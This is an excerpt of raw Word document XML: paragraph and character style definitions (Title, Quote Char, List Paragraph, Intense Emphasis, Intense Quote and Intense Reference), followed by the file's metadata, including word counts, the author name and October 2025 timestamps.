  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00014C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4C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4C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4C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4CA7"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00014CA7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00014CA7"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00014CA7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00014C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4CA7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00014CA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27</Pages>
  <Words>8360</Words>
  <Characters>47657</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>397</Lines>
  <Paragraphs>111</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>55906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Richards</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Grant Richards</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-19T01:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-19T01:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>